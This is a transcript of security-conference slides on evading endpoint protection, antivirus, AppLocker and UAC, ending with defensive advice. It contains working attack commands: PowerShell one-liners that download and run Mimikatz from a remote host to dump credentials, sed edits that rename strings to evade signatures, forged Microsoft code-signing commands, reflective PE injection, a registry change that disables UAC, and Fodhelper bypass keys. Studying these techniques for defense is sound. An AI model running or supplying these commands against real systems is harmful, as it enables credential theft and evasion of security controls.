Endpoint is not enough
-
Upload
sumedt-jitpukdebodin -
Category
Technology
-
view
716 -
download
1
Transcript of Endpoint is not enough
![Page 1: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/1.jpg)
Endpoint protection is not enough.
BySumedt Jitpukdebodin
LPIC-1, NCLA, Comptia Security+, C|EHv6, eCPPT, IWSS, CPTE, GIAC GPEN, OSCP
![Page 2: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/2.jpg)
# wHoAmi• Name: Sumedt Jitpukdebodin
• Job: Security Consultant @ G-ABLE,
• Non-profit job: OWASP Thailand, 2600Thailand
• Hobbies: Hacking, Digital Forensic, Malware Analysis, Programming, excite in many security fields.
• My item: www.techsuii.com, หนังสือก้าวแรกสู่นักทดสอบเจาะระบบ
• Another: Reconnaissance Me.
![Page 3: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/3.jpg)
Objective
• Statistics
• Endpoint Protection
• Bypassing
![Page 4: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/4.jpg)
Statistics
![Page 5: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/5.jpg)
Malware Statistics
![Page 6: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/6.jpg)
Distribution of malware under Windows in 2016
![Page 7: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/7.jpg)
TOP 10 file extensions malware Q1 2017
![Page 8: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/8.jpg)
Endpoint Protection
![Page 9: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/9.jpg)
What is Endpoint Protection?
• Endpoint security or endpoint protection is an approach to the protection of computer networks that are remotely bridged to client devices. The connection of laptops, tablets, mobile phones and other wireless devices to corporate networks creates attack paths for security threats.
![Page 10: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/10.jpg)
Why we use Endpoint Protection
![Page 11: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/11.jpg)
How Antivirus works
• Based on heuristic
• Based on signature
• Based on cloud
![Page 12: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/12.jpg)
Evasion Techniques
• Anti-security techniques (Avoid detection)
• Anti-sandbox techniques (Avoid automatic analysis)
• Anti-analyst techniques (Avoid analysis)
![Page 13: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/13.jpg)
Anti-security techniques
• Obfuscation
• Crypter
• Packer
• FUD (Fully UnDetectable by antimalware)
• etc.
![Page 14: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/14.jpg)
Framework for generate bypass antivirus malware
• Veil
• TheFatRat
• Winpayloads
• Dr0p1t-Framework
• Avet
• VBad
• Obfuscated Empire
• OWASP-ZSC
• etc
![Page 15: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/15.jpg)
Invoke-Mimikatz
• powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
![Page 16: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/16.jpg)
Just a Mimikatz
• sed -i -e 's/Invoke-Mimikatz/Invoke-redpill2017/g' redpill2017.ps1
• sed -i -e '/<#/,/#>/c\\' redpill2017.ps1
• sed -i -e 's/^[[:space:]]*#.*$//g' redpill2017.ps1
• sed -i -e 's/DumpCreds/DumpCred/g' redpill2017.ps1
• sed -i -e 's/ArgumentPtr/NotTodayPal/g' redpill2017.ps1
• sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' redpill2017.ps1
• sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" redpill2017.ps1
![Page 17: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/17.jpg)
Show time (1)
![Page 18: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/18.jpg)
Invoke-redpill2017
• powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.211.55.3:9000/redpill2017.ps1'); Invoke-redpill2017 -DumpCred"
![Page 19: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/19.jpg)
Sign malware with fake certificate
• osslsigncode verify <microsoft exe>
• openssl req -x509 -newkey rsa:4096 -keyout fake_microsoft_key.pem -out fake_microsoft_cert.pem -days 365 -subj “/C=US/ST=Washington/L=Redmond/O=Microsoft Corporation/OU=MOPR/CN=Microsoft Corporation”
• osslsigncode sign -in evil.exe -key fake_microsoft_key.pem -certs fake_microsoft_cert.pem -out evil_signed.exe
![Page 20: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/20.jpg)
![Page 21: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/21.jpg)
But run EXE is so hard…
![Page 22: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/22.jpg)
Try to use indirect ways
• Macro
• vbs
• DLL
• hta (HTML Application)
• PS1
• etc.
![Page 23: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/23.jpg)
Example of HTA with vbscript
![Page 24: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/24.jpg)
Show time (2)
![Page 25: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/25.jpg)
AppLocker
• Whitelisting application
• Executable files, scripts, Windows Installer files, dynamic-link libraries (DLLs), packaged apps, and packaged app installers
• Windows 7 >
• Single computer (secpol.msc), Group Policy Management (gpmc.msc)
![Page 26: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/26.jpg)
AppLocker File Type
• These are regular .exe and .com applications (cmd.exe, ipconfig.exe, etc.)
• Windows Installer files (.msi, .msp, .mst), typically used to install a new software on the machine.
• Script files with the following extensions .ps1, .vbs, .vba, .cmd and .js.
• Packaged Apps installed through the Microsoft Store
• DLL files (.dll and .ocx in the advanced tab).
![Page 27: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/27.jpg)
AppLocker Rule
• Execution Path
• Publisher Information
• File Hash
![Page 28: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/28.jpg)
Bypass AppLocker• Find exception path
• “C:\Windows\Tasks”
• “C:\Windows\tracing”
• Load file from memory (PowerSploit framework)
• $ByteArray = [System.IO.File]::ReadAllBytes(“C:\users\richard\desktop\mimikatz.exe");
• Invoke-expression(Get-Content .\Invoke-ReflectivePEInjection.ps1 |out-string)
• Invoke-ReflectivePEInjection -PEBytes $ByteArray
• Obfuscate exe for bypass hash
• Powershell without powershell (Casey Smith) (Powershell Empire) and StarFighter
• Registry Key Manipulation
• Run PE file by using microsoft tool
• C:\windows\system32\rundll32.exe
• C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe ( install and uninstall applications via the command prompt)
• C:\Windows\System32\regsvr32.exe (Install and Uninstall dll file)
• C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (Using to build products in environments where Visual Studio is not installed)
![Page 29: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/29.jpg)
Show time (3)
![Page 30: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/30.jpg)
UAC• User Account Control (UAC)
• Run with standard user rights instead of full administrator rights
• C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
• C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
![Page 31: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/31.jpg)
Bypass UAC• Using mistake of any autoElevate binary (Using sigcheck for check autoElevate flag)
• UACMe
• DLL Hijacking
• autoElevate
• Elevated COM interface
• SDCLT - Backup command with specific option
• Fodhelper - Manage Optional Features
• Using process or dll injection into Windows Publisher Certificate
• Using Windows Update Standalone Installer (wusa.exe)
• etc.
![Page 32: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/32.jpg)
Bypass UAC with Fodhelper• Fodhelper.exe (%WINDIR%\\System32\\fodhelper.exe)
• Missing registry
• HKCU:\Software\Classes\ms-settings\shell\open\command
• HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute
• HKCU:\Software\Classes\ms-settings\shell\open\command\(default)
![Page 33: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/33.jpg)
The last show time (4)
![Page 34: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/34.jpg)
Protecting against malware
• People: Security Awareness Training, Always update yourself.
• Process: Restrict program install or usage with policy, Updates, Backups, Governance, Intelligence, Incident response plan, and more => Security Team
• Technology: Technology supports the team and processes
• Backup
• Antivirus
• Anti-ransomware
• Endpoint Detection
![Page 35: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/35.jpg)
Q & A
![Page 36: Endpoint is not enough](https://reader030.fdocuments.in/reader030/viewer/2022021500/5a6606147f8b9a9e4a8b469b/html5/thumbnails/36.jpg)
Resource• https://www.blackhillsinfosec.com/?p=5555
• https://github.com/nccgroup/Winpayloads
• https://www.youtube.com/watch?v=6bUoz5ChTOs
• https://github.com/D4Vinci/Dr0p1t-Framework
• https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf
• https://www.av-test.org/fileadmin/pdf/security_report/AV-TEST_Security_Report_2016-2017.pdf
• https://github.com/Pepitoh/VBad
• https://stackoverflow.com/questions/18287960/signing-windows-application-on-linux-based-distros
• https://twitter.com/Andrew___Morris/status/879712530041626627
• https://github.com/cobbr/ObfuscatedEmpire
• https://pentestlab.blog/tag/uac/
• https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
• https://www.greyhathacker.net/?p=796
• https://pen-testing.sans.org/resources/papers/gpen/windows-script-host-hack-windows-120189
• https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques
• https://www.slideshare.net/CTruncer/the-supporting-role-of-antivirus-evasion-while-persisting
• https://github.com/api0cradle/UltimateAppLockerByPassList
• https://offsec.provadys.com/UAC-bypass-dotnet.html